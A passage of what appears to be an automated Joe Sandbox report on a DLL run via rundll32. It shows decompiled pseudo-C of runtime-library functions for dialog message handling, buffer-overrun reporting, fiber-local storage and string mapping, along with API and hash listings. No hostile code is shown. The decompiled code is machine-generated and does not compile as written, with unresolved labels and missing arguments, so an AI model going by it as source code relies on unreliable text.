												_t139 = E1000F9FA( *(_t226 + 8),  *(_t226 - 0x14),  *(_t226 - 0x24));
											} else {
												_t139 = E10020A8C(_t226, _t138);
											}
											_t211 = _t139;
											__eflags = _t211;
											if(_t211 == 0) {
												goto L47;
											} else {
												 *((intOrPtr*)( *((intOrPtr*)( *(_t226 + 8) + 0x48)) + 0x6c)) = 0;
												E1000FA34(_t211);
												__eflags =  *(_t222 + 8);
												if( *(_t222 + 8) != 0) {
													SendMessageA( *(_t211 + 0x1c), 0xf1, 1, 0);
												}
												goto L90;
											}
										} else {
											 *((intOrPtr*)( *( *(_t222 + 4)) + 0xac))(_t208);
											L90:
											_t209 = 1;
											goto L50;
										}
									}
								}
								__eflags = _t186 - 0x28;
								if(_t186 <= 0x28) {
									goto L81;
								}
								__eflags = _t186 - 0x2b;
								if(_t186 != 0x2b) {
									goto L47;
								}
								L68:
								__eflags = _t119 & 0x00000004;
								if((_t119 & 0x00000004) != 0) {
									goto L47;
								}
								_t147 = E1000F9D9( *(_t226 - 0x14));
								__eflags = _t147 & 0x00000010;
								if((_t147 & 0x00000010) == 0) {
									_t148 = E1000FFB8( *(_t226 + 8));
								} else {
									_t218 =  *(_t226 - 0x14);
									_t148 = E10022A7A(_t218);
								}
								_t213 = 0;
								__eflags = _t218;
								 *((intOrPtr*)(_t226 - 0x20)) = _t148;
								if(_t218 != 0) {
									L76:
									_t149 = E10022AF4(_t218);
									__eflags = _t149;
									if(_t149 != 0) {
										__eflags =  *((intOrPtr*)(_t218 + 0x4c)) - _t213;
										if( *((intOrPtr*)(_t218 + 0x4c)) == _t213) {
											goto L47;
										}
										_push(_t213);
										_push(_t213);
										_push(_t213);
										_push(1);
										_push(0xfffffdd9);
										_push(_t218);
										 *(_t226 - 4) = _t213;
										E10022B51();
										 *(_t226 - 4) =  *(_t226 - 4) | 0xffffffff;
										goto L90;
									}
									MessageBeep(_t213);
									goto L47;
								} else {
									L75:
									_t218 = E1000FEB2( *(_t226 + 8),  *((intOrPtr*)(_t226 - 0x20)));
									__eflags = _t218 - _t213;
									if(_t218 == _t213) {
										goto L47;
									}
									goto L76;
								}
							}
							if(__eflags == 0) {
								L74:
								_t213 = 0;
								__eflags = 0;
								goto L75;
							}
							__eflags = _t186 - 3;
							if(_t186 == 3) {
								goto L74;
							}
							__eflags = _t186 - 9;
							if(_t186 == 9) {
								__eflags = _t119 & 0x00000002;
								if((_t119 & 0x00000002) != 0) {
									goto L47;
								}
								_t153 = GetKeyState(0x10);
								_t223 =  *(_t226 + 8);
								__eflags = _t153;
								_t185 = 0 | _t153 < 0x00000000;
								_t154 = E10022C9C(_t223, 0, _t153 < 0);
								__eflags = _t154;
								if(_t154 == 0) {
									goto L47;
								}
								__eflags =  *(_t154 + 4);
								if( *(_t154 + 4) == 0) {
									_t155 =  *_t154;
									__eflags = _t155;
									if(_t155 == 0) {
										_t156 = E10007389(_t223,  *((intOrPtr*)(_t226 - 0x1c)), _t185);
									} else {
										_t156 = E10020A8C(_t226, _t155);
									}
									_t214 = _t156;
									__eflags = _t214;
									if(_t214 != 0) {
										 *( *((intOrPtr*)(_t223 + 0x48)) + 0x6c) =  *( *((intOrPtr*)(_t223 + 0x48)) + 0x6c) & 0x00000000;
										E1000FA34(_t214);
										E1000FE37( *(_t226 - 0x14), _t214);
									}
								} else {
									 *((intOrPtr*)( *( *(_t154 + 4)) + 0xac))(_t208);
								}
								goto L90;
							}
							__eflags = _t186 - 0xd;
							if(_t186 == 0xd) {
								goto L68;
							}
							goto L47;
						}
						_t163 = _t118;
						__eflags = _t163;
						if(_t163 == 0) {
							L33:
							_t164 = E1000F94B( *((intOrPtr*)(_t226 - 0x1c)), _t208);
							__eflags =  *(_t226 - 0x18) - 0x102;
							if( *(_t226 - 0x18) != 0x102) {
								L35:
								_t203 = _t208->wParam;
								__eflags = _t203 - 9;
								if(_t203 != 9) {
									L37:
									__eflags = _t203 - 0x20;
									if(__eflags != 0) {
										_t165 = E1000FCEF(0x100, _t203, __eflags,  *(_t226 + 8),  *((intOrPtr*)(_t226 - 0x1c)), _t208);
										__eflags = _t165;
										if(_t165 == 0) {
											goto L47;
										}
										_t166 =  *(_t165 + 4);
										__eflags = _t166;
										if(_t166 == 0) {
											goto L47;
										} else {
											E1000AAF8(_t166, _t208);
											goto L90;
										}
									}
									goto L38;
								}
								__eflags = _t164 & 0x00000002;
								if((_t164 & 0x00000002) != 0) {
									goto L47;
								}
								goto L37;
							}
							__eflags = _t164 & 0x00000084;
							if((_t164 & 0x00000084) != 0) {
								goto L47;
							}
							goto L35;
						}
						__eflags = _t163 != 4;
						if(_t163 != 4) {
							goto L47;
						}
						__eflags =  *(_t226 - 0x14);
						if( *(_t226 - 0x14) != 0) {
							L32:
							__eflags = _t208->wParam - 0x20;
							if(_t208->wParam == 0x20) {
								goto L47;
							}
							goto L33;
						}
						_t169 = GetKeyState(0x12);
						__eflags = _t169;
						if(_t169 >= 0) {
							goto L47;
						}
						goto L32;
					} else {
						_t224 =  *(_t226 - 0x14);
						while( *(_t224 + 0x4c) == 0 && E10020A8C(_t226, GetParent( *(_t224 + 0x1c))) !=  *(_t226 + 8)) {
							_t224 = E10020A8C(_t226, GetParent( *(_t224 + 0x1c)));
							if(_t224 != 0) {
								continue;
							}
							break;
						}
						if(_t224 == 0) {
							L17:
							__eflags =  *(_t226 - 0x18) - 0x101;
							if( *(_t226 - 0x18) == 0x101) {
								L20:
								__eflags = _t224;
								if(_t224 == 0) {
									L26:
									_t208 =  *(_t226 + 0xc);
									goto L27;
								}
								_t225 =  *(_t224 + 0x4c);
								__eflags = _t225;
								if(_t225 == 0) {
									goto L26;
								}
								_t171 =  *(_t226 + 0xc)->wParam;
								__eflags = _t171 - 0xd;
								if(_t171 != 0xd) {
									L24:
									__eflags = _t171 - 0x1b;
									if(_t171 != 0x1b) {
										goto L26;
									}
									__eflags =  *(_t225 + 0x80) & 0x00000002;
									if(( *(_t225 + 0x80) & 0x00000002) != 0) {
										L38:
										_t123 = 0;
										L54:
										 *[fs:0x0] =  *((intOrPtr*)(_t226 - 0xc));
										return _t123;
									}
									goto L26;
								}
								__eflags =  *(_t225 + 0x80) & 0x00000001;
								if(( *(_t225 + 0x80) & 0x00000001) != 0) {
									goto L38;
								}
								goto L24;
							}
							__eflags =  *(_t226 - 0x18) - 0x100;
							if( *(_t226 - 0x18) == 0x100) {
								goto L20;
							}
							__eflags =  *(_t226 - 0x18) - 0x102;
							if( *(_t226 - 0x18) != 0x102) {
								goto L26;
							}
							goto L20;
						}
						_t172 =  *(_t224 + 0x4c);
						if(_t172 == 0 ||  *((intOrPtr*)(_t172 + 0x54)) == 0) {
							goto L17;
						} else {
							_t173 =  *((intOrPtr*)(_t172 + 0x54));
							_t174 =  *((intOrPtr*)( *_t173 + 0x14))(_t173,  *(_t226 + 0xc));
							if(_t174 != 0) {
								goto L17;
							} else {
								_t123 = _t174 + 1;
								goto L54;
							}
						}
					}
				}
			}

APIs

__EH_prolog.LIBCMT ref: 100100CA
GetFocus.USER32 ref: 100100F3
GetParent.USER32(?), ref: 10010148
GetParent.USER32(?), ref: 10010158
GetKeyState.USER32(00000012), ref: 10010210
IsDialogMessageA.USER32(?,?,?,?,?,00000000), ref: 100102BF
GetFocus.USER32 ref: 100102D1
GetFocus.USER32(00000000), ref: 100102DE

Part of subcall function 10007389: GetNextDlgTabItem.USER32(?,?,?), ref: 1000739C

IsWindow.USER32(?), ref: 100102F6
GetFocus.USER32 ref: 10010302
IsWindow.USER32(?), ref: 10010318
GetFocus.USER32 ref: 1001031E
GetKeyState.USER32(00000010), ref: 1001034F
MessageBeep.USER32(00000000), ref: 10010446
SendMessageA.USER32(?,000000F1,00000001,00000000), ref: 1001052D

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Focus$Message$ParentStateWindow$BeepDialogH_prologItemNextSend
String ID:
API String ID: 2999224188-0
Opcode ID: 56db4c59f6b27ad05a44fd0264fc1ec7519c3ae96e1b6f05808159883d19c858
Instruction ID: 24fb51d1e6f86d779c1a868f906becb8f2c056fb4188cb8430d2305d0d8abd07
Opcode Fuzzy Hash: 56db4c59f6b27ad05a44fd0264fc1ec7519c3ae96e1b6f05808159883d19c858
Instruction Fuzzy Hash: 50C1A234B00206ABDB21DFA4C889AAE7BF5EF44390F514019F895AF162CBB4EDC1DB51

Uniqueness

Uniqueness Score: -1.00%

Function 10017192 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 97
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 59%

			E10017192(void* __ebx, signed char** __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t22;
				intOrPtr* _t23;
				void* _t31;
				void* _t58;
				signed char* _t60;
				signed char** _t66;
				char* _t68;
				void* _t70;
				intOrPtr _t71;
				void* _t72;
				intOrPtr _t73;

				_t67 = __edi;
				_t66 = __edx;
				_t54 = __ebx;
				_push(0x118);
				_push(0x1002f1c8);
				E10012CE0(__ebx, __edi, __esi);
				_t22 =  *0x100371f4; // 0x82d1d2ba
				 *((intOrPtr*)(_t72 - 0x1c)) = _t22;
				_t23 =  *0x1003a4b0; // 0x0
				if(_t23 == 0) {
					if( *((intOrPtr*)(_t72 + 8)) == 1) {
						_t68 = "Buffer overrun detected!";
						 *(_t72 - 0x128) = "A buffer overrun has been detected which has corrupted the program\'s\ninternal state.  The program cannot safely continue execution and must\nnow be terminated.\n";
						_t70 = 0xb9;
					} else {
						_t68 = "Unknown security failure detected!";
						 *(_t72 - 0x128) = "A security error of unknown cause has been detected which has\ncorrupted the program\'s internal state.  The program cannot safely\ncontinue execution and must now be terminated.\n";
						_t70 = 0xd4;
					}
					 *((char*)(_t72 - 0x20)) = 0;
					if(GetModuleFileNameA(0, _t72 - 0x124, 0x104) == 0) {
						E10018100(_t72 - 0x124, "<program name unknown>");
					}
					_t54 = _t72 - 0x124;
					if(E10012000(_t72 - 0x124) + 0xb > 0x3c) {
						E10019990(E10012000(_t54) + _t72 - 0xf3, "...", 3);
						_t73 = _t73 + 0x10;
					}
					_t31 = E10012000(_t54);
					_pop(_t58);
					E100116D0(_t31 + _t70 + 0x0000000c + 0x00000003 & 0xfffffffc, _t58);
					 *((intOrPtr*)(_t72 - 0x18)) = _t73;
					_t71 = _t73;
					E10018100(_t71, _t68);
					_t67 = "\n\n";
					E10018110(_t71, "\n\n");
					E10018110(_t71, "Program: ");
					E10018110(_t71, _t54);
					E10018110(_t71, "\n\n");
					E10018110(_t71,  *(_t72 - 0x128));
					_push(0x12010);
					_push("Microsoft Visual C++ Runtime Library");
					_push(_t71);
					E1001A6B4();
				} else {
					 *(_t72 - 4) = 0;
					 *_t23( *((intOrPtr*)(_t72 + 8)),  *((intOrPtr*)(_t72 + 0xc)));
					 *(_t72 - 4) =  *(_t72 - 4) | 0xffffffff;
				}
				E10011C32(3);
				asm("int3");
				_t19 =  &(_t66[1]);
				 *_t19 = _t66[1] - 1;
				if( *_t19 < 0) {
					return E1001A7AD(_t54, _t67, _t72, _t66);
				} else {
					_t60 =  *_t66;
					 *_t66 =  &(_t60[1]);
					return  *_t60 & 0x000000ff;
				}
			}

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,1002F1C8,00000118,10011A31,00000001,00000000,1002E848,00000008,100170E8,00000000,00000000,00000000), ref: 10017213
_strcat.LIBCMT ref: 10017229
_strlen.LIBCMT ref: 10017239
_strlen.LIBCMT ref: 1001724A
_strncpy.LIBCMT ref: 10017264
_strlen.LIBCMT ref: 1001726D
_strcat.LIBCMT ref: 10017289

Strings

Microsoft Visual C++ Runtime Library, xrefs: 100172C4
Program: , xrefs: 1001729A
Unknown security failure detected!, xrefs: 100171D9
<program name unknown>, xrefs: 1001721D
Buffer overrun detected!, xrefs: 100171EF, 10017287
..., xrefs: 1001725E

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: _strlen$_strcat$FileModuleName_strncpy
String ID: ...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
API String ID: 3058806289-1673886896
Opcode ID: 21d78823f48611dff99e1650d3bc88c8259584d6f344628f086aad00bfea2042
Instruction ID: 19ecb47b45d33fe3bd27c3986d3733d74a7dd1b29f40fd9d70e1a0664b46184a
Opcode Fuzzy Hash: 21d78823f48611dff99e1650d3bc88c8259584d6f344628f086aad00bfea2042
Instruction Fuzzy Hash: E431E8769002187BDB11D7609C86FDE3668EF05390F50016AF514AE143DB35EBD287A5

Uniqueness

Uniqueness Score: -1.00%

Function 100144DA Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 71
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E100144DA() {
				void* __edi;
				void* __esi;
				intOrPtr _t7;
				struct HINSTANCE__* _t9;
				struct HINSTANCE__* _t11;
				long _t12;
				_Unknown_base(*)()* _t16;
				void* _t22;
				struct HINSTANCE__* _t26;
				void* _t30;
				struct HINSTANCE__* _t32;

				if(E10014B8B() != 0) {
					_push(_t30);
					_t26 = GetModuleHandleA("kernel32.dll");
					__eflags = _t26;
					if(_t26 != 0) {
						_t30 = GetProcAddress;
						 *0x1003a1c8 = GetProcAddress(_t26, "FlsAlloc");
						 *0x1003a1cc = GetProcAddress(_t26, "FlsGetValue");
						 *0x1003a1d0 = GetProcAddress(_t26, "FlsSetValue");
						_t16 = GetProcAddress(_t26, "FlsFree");
						__eflags =  *0x1003a1cc;
						 *0x1003a1d4 = _t16;
						if( *0x1003a1cc == 0) {
							 *0x1003a1cc = TlsGetValue;
							 *0x1003a1d0 = TlsSetValue;
							 *0x1003a1c8 = E100142BA;
							 *0x1003a1d4 = TlsFree;
						}
					}
					_t7 =  *0x1003a1c8(E10014364);
					__eflags = _t7 - 0xffffffff;
					 *0x10037494 = _t7;
					if(__eflags == 0) {
						L9:
						E100142C3();
						_t9 = 0;
						__eflags = 0;
					} else {
						_push(0x8c);
						_push(1);
						_t32 = E10013955(_t22, 1, _t30, __eflags);
						__eflags = _t32;
						if(_t32 == 0) {
							goto L9;
						} else {
							_t11 =  *0x1003a1d0( *0x10037494, _t32);
							__eflags = _t11;
							if(_t11 == 0) {
								goto L9;
							} else {
								 *((intOrPtr*)(_t32 + 0x54)) = 0x10037a08;
								 *((intOrPtr*)(_t32 + 0x14)) = 1;
								_t12 = GetCurrentThreadId();
								 *(_t32 + 4) =  *(_t32 + 4) | 0xffffffff;
								 *_t32 = _t12;
								_t9 = 1;
							}
						}
					}
					return _t9;
				} else {
					E100142C3();
					return 0;
				}
			}

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,100117B3,?,?,?,10011907,?,?,?,1002E838,0000000C), ref: 100144F2
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 1001450A
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 10014517
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 10014524
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 10014531
FlsAlloc.KERNEL32(Function_00014364,?,?,?,10011907,?,?,?,1002E838,0000000C), ref: 1001456E
FlsSetValue.KERNEL32(00000000,?,?,?,10011907,?,?,?,1002E838,0000000C), ref: 1001459B
GetCurrentThreadId.KERNEL32 ref: 100145AF

Part of subcall function 100142C3: FlsFree.KERNEL32(FFFFFFFF,10011842,?,?,10011907,?,?,?,1002E838,0000000C), ref: 100142CE
Part of subcall function 100142C3: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,10011842,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10014BEF
Part of subcall function 100142C3: DeleteCriticalSection.KERNEL32(FFFFFFFF,?,?,10011842,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10014C19

Strings

FlsGetValue, xrefs: 1001450C
FlsSetValue, xrefs: 10014519
FlsAlloc, xrefs: 10014504
FlsFree, xrefs: 10014526
kernel32.dll, xrefs: 100144ED

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$kernel32.dll
API String ID: 2635119114-282957996
Opcode ID: 2e103f57caa91a0cfb90aac41c3c104b5786fb34048b9bb1a032e375845c9179
Instruction ID: af069f205ff7abee73080b4f93dad51a1e22592e06cb8c6d60a03263aa4c0447
Opcode Fuzzy Hash: 2e103f57caa91a0cfb90aac41c3c104b5786fb34048b9bb1a032e375845c9179
Instruction Fuzzy Hash: 7D215B70941A619FE362DF359C8891A7EE5FB827A0B52062AF845CF272DB31D8C1DB50

Uniqueness

Uniqueness Score: -1.00%

Function 10018266 Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 299
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E10018266(void* __ebx, void* __edi, int __esi, void* __eflags) {
				signed int _t119;
				intOrPtr _t120;
				int _t122;
				char* _t125;
				int _t132;
				signed int _t134;
				int _t137;
				int _t138;
				int _t157;
				short* _t160;
				short* _t163;
				int _t164;
				signed int _t165;
				long _t169;
				signed int _t172;
				int _t181;
				char* _t183;
				int _t184;
				signed int _t186;
				int _t187;
				int _t190;
				void* _t192;
				short* _t193;
				char* _t195;
				char* _t196;
				signed int _t199;

				_t185 = __esi;
				_push(0x38);
				_push(0x1002f1e8);
				E10012CE0(__ebx, __edi, __esi);
				_t199 =  *0x1003a4d8; // 0x1
				if(_t199 == 0) {
					_t185 = 1;
					if(LCMapStringW(0, 0x100, 0x1002e9cc, 1, 0, 0) == 0) {
						_t169 = GetLastError();
						__eflags = _t169 - 0x78;
						if(_t169 == 0x78) {
							 *0x1003a4d8 = 2;
						}
					} else {
						 *0x1003a4d8 = 1;
					}
				}
				if( *(_t192 + 0x14) <= 0) {
					L11:
					_t119 =  *0x1003a4d8; // 0x1
					if(_t119 == 2 || _t119 == 0) {
						 *(_t192 - 0x28) = 0;
						_t183 = 0;
						 *(_t192 - 0x3c) = 0;
						__eflags =  *(_t192 + 8);
						if( *(_t192 + 8) == 0) {
							_t138 =  *0x1003a4c0; // 0x0
							 *(_t192 + 8) = _t138;
						}
						__eflags =  *(_t192 + 0x20);
						if( *(_t192 + 0x20) == 0) {
							_t137 =  *0x1003a4d0; // 0x0
							 *(_t192 + 0x20) = _t137;
						}
						_t120 = E10019AB4( *(_t192 + 8));
						 *((intOrPtr*)(_t192 - 0x40)) = _t120;
						__eflags = _t120 - 0xffffffff;
						if(_t120 != 0xffffffff) {
							__eflags = _t120 -  *(_t192 + 0x20);
							if(__eflags == 0) {
								_t186 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 + 0x18),  *(_t192 + 0x1c));
								L61:
								__eflags =  *(_t192 - 0x28);
								if( *(_t192 - 0x28) != 0) {
									_push( *(_t192 - 0x28));
									E1001111B();
								}
								_t122 = _t186;
								goto L64;
							}
							_push(0);
							_push(0);
							_t175 = _t192 + 0x14;
							_push(_t192 + 0x14);
							_push( *(_t192 + 0x10));
							_push(_t120);
							_push( *(_t192 + 0x20));
							_t125 = E10019AF7(0, _t183, _t185, __eflags);
							_t195 =  &(_t193[0xc]);
							 *(_t192 - 0x28) = _t125;
							__eflags = _t125;
							if(_t125 == 0) {
								goto L46;
							}
							_t187 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc), _t125,  *(_t192 + 0x14), 0, 0);
							 *(_t192 - 0x24) = _t187;
							__eflags = _t187;
							if(_t187 == 0) {
								_t186 =  *(_t192 - 0x48);
								L58:
								__eflags =  *(_t192 - 0x3c);
								if( *(_t192 - 0x3c) != 0) {
									_push(_t183);
									E1001111B();
								}
								goto L61;
							}
							 *(_t192 - 4) = 0;
							E100116D0(_t126 + 0x00000003 & 0xfffffffc, _t175);
							 *(_t192 - 0x18) = _t195;
							_t183 = _t195;
							 *(_t192 - 0x44) = _t183;
							E10012400(_t183, 0, _t187);
							_t196 =  &(_t195[0xc]);
							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
							__eflags = _t183;
							if(_t183 != 0) {
								L54:
								_t132 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x28),  *(_t192 + 0x14), _t183,  *(_t192 - 0x24));
								 *(_t192 - 0x24) = _t132;
								__eflags = _t132;
								if(__eflags != 0) {
									_push( *(_t192 + 0x1c));
									_push( *(_t192 + 0x18));
									_push(_t192 - 0x24);
									_push(_t183);
									_push( *(_t192 + 0x20));
									_push( *((intOrPtr*)(_t192 - 0x40)));
									_t134 = E10019AF7(0, _t183, _t187, __eflags);
									asm("sbb esi, esi");
									_t186 =  ~( ~_t134);
									goto L58;
								}
								goto L55;
							} else {
								_t183 = E10011233( *(_t192 - 0x24));
								__eflags = _t183;
								if(_t183 == 0) {
									L55:
									_t186 = 0;
									goto L58;
								}
								E10012400(_t183, 0,  *(_t192 - 0x24));
								_t196 =  &(_t196[0xc]);
								 *(_t192 - 0x3c) = 1;
								goto L54;
							}
						} else {
							goto L46;
						}
					} else {
						if(_t119 != 1) {
							L46:
							_t122 = 0;
							L64:
							return E10012D1B(_t122);
						}
						_t184 = 0;
						 *(_t192 - 0x2c) = 0;
						 *(_t192 - 0x38) = 0;
						 *(_t192 - 0x34) = 0;
						if( *(_t192 + 0x20) == 0) {
							_t164 =  *0x1003a4d0; // 0x0
							 *(_t192 + 0x20) = _t164;
						}
						_t190 = MultiByteToWideChar( *(_t192 + 0x20), 1 + (0 |  *((intOrPtr*)(_t192 + 0x24)) != 0x00000000) * 8,  *(_t192 + 0x10),  *(_t192 + 0x14), 0, 0);
						 *(_t192 - 0x30) = _t190;
						if(_t190 == 0) {
							goto L46;
						} else {
							 *(_t192 - 4) = 1;
							E100116D0(_t190 + _t190 + 0x00000003 & 0xfffffffc, _t172);
							 *(_t192 - 0x18) = _t193;
							 *(_t192 - 0x1c) = _t193;
							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
							if( *(_t192 - 0x1c) != 0) {
								L21:
								if(MultiByteToWideChar( *(_t192 + 0x20), 1,  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 - 0x1c), _t190) == 0) {
									L36:
									if( *(_t192 - 0x34) != 0) {
										_push( *(_t192 - 0x20));
										E1001111B();
									}
									if( *(_t192 - 0x38) != 0) {
										_push( *(_t192 - 0x1c));
										E1001111B();
									}
									_t122 = _t184;
									goto L64;
								}
								_t184 = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190, 0, 0);
								 *(_t192 - 0x2c) = _t184;
								if(_t184 == 0) {
									goto L36;
								}
								if(( *(_t192 + 0xd) & 0x00000004) == 0) {
									 *(_t192 - 4) = 2;
									E100116D0(_t184 + _t184 + 0x00000003 & 0xfffffffc, _t172);
									 *(_t192 - 0x18) = _t193;
									 *(_t192 - 0x20) = _t193;
									 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
									__eflags =  *(_t192 - 0x20);
									if( *(_t192 - 0x20) != 0) {
										L31:
										_t157 = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 - 0x20), _t184);
										__eflags = _t157;
										if(_t157 != 0) {
											_push(0);
											_push(0);
											__eflags =  *(_t192 + 0x1c);
											if( *(_t192 + 0x1c) != 0) {
												_push( *(_t192 + 0x1c));
												_push( *(_t192 + 0x18));
											} else {
												_push(0);
												_push(0);
											}
											_t184 = WideCharToMultiByte( *(_t192 + 0x20), 0,  *(_t192 - 0x20), _t184, ??, ??, ??, ??);
										}
										goto L36;
									} else {
										_t160 = E10011233(_t184 + _t184);
										 *(_t192 - 0x20) = _t160;
										__eflags = _t160;
										if(_t160 == 0) {
											goto L36;
										}
										 *(_t192 - 0x34) = 1;
										goto L31;
									}
								}
								if( *(_t192 + 0x1c) != 0 && _t184 <=  *(_t192 + 0x1c)) {
									LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 + 0x18),  *(_t192 + 0x1c));
								}
								goto L36;
							} else {
								_t163 = E10011233(_t190 + _t190);
								_pop(_t172);
								 *(_t192 - 0x1c) = _t163;
								if(_t163 == 0) {
									goto L46;
								}
								 *(_t192 - 0x38) = 1;
								goto L21;
							}
						}
					}
				}
				_t181 =  *(_t192 + 0x14);
				_t165 =  *(_t192 + 0x10);
				while(1) {
					_t172 = _t181 - 1;
					if( *_t165 == 0) {
						break;
					}
					_t165 = _t165 + 1;
					if(_t172 != 0) {
						continue;
					}
					_t172 = _t172 | 0xffffffff;
					break;
				}
				 *(_t192 + 0x14) =  *(_t192 + 0x14) + (_t165 | 0xffffffff) - _t172;
				goto L11;
			}

APIs

LCMapStringW.KERNEL32(00000000,00000100,1002E9CC,00000001,00000000,00000000,1002F1E8,00000038,10012713,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 1001828D
GetLastError.KERNEL32 ref: 1001829F
MultiByteToWideChar.KERNEL32(?,00000000,100129C0,?,00000000,00000000,1002F1E8,00000038,10012713,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 10018326
MultiByteToWideChar.KERNEL32(?,00000001,100129C0,?,?,00000000), ref: 100183A7
LCMapStringW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 100183C1
LCMapStringW.KERNEL32(00000000,00000000,?,00000000,?,?), ref: 100183FC

Strings

@hvpYv, xrefs: 10018493

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: String$ByteCharMultiWide$ErrorLast
String ID: @hvpYv
API String ID: 1775797328-2766943729
Opcode ID: 5777c4d7027dff9c9b409d5aeb58933a6c7c88dae46e3481cf6094212a665003
Instruction ID: b77d93e963007cb419293e7f2dd35d286a24c56a776a93d47894a7fb6c141361
Opcode Fuzzy Hash: 5777c4d7027dff9c9b409d5aeb58933a6c7c88dae46e3481cf6094212a665003
Instruction Fuzzy Hash: D4B1287280061AEFDF12CFA4CC858DE7BB5FB08394F214129FA15AA160D735DBA1DB50

Uniqueness

Uniqueness Score: -1.00%

Function 1001A6B4 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 90
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 29%

			E1001A6B4(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a14) {
				char _v8;
				signed char _v12;
				char _v20;
				intOrPtr* _t13;
				intOrPtr* _t14;
				intOrPtr* _t17;
				void* _t19;
				_Unknown_base(*)()* _t23;
				_Unknown_base(*)()* _t26;
				void* _t28;
				struct HINSTANCE__* _t31;
				void* _t33;

				_t28 = 0;
				_t33 =  *0x1003a618 - _t28; // 0x0
				if(_t33 != 0) {
					L6:
					_t13 =  *0x1003a624; // 0x0
					if(_t13 == 0) {
						L14:
						_t14 =  *0x1003a61c; // 0x0
						if(_t14 != 0) {
							_t28 =  *_t14();
							if(_t28 != 0) {
								_t17 =  *0x1003a620; // 0x0
								if(_t17 != 0) {
									_t28 =  *_t17(_t28);
								}
							}
						}
						L18:
						return  *0x1003a618(_t28, _a4, _a8, _a12);
					}
					_t19 =  *_t13();
					if(_t19 == 0) {
						L10:
						if( *0x1003a180 < 4) {
							_a14 = _a14 | 0x00000004;
						} else {
							_a14 = _a14 | 0x00000020;
						}
						goto L18;
					}
					_push( &_v8);
					_push(0xc);
					_push( &_v20);
					_push(1);
					_push(_t19);
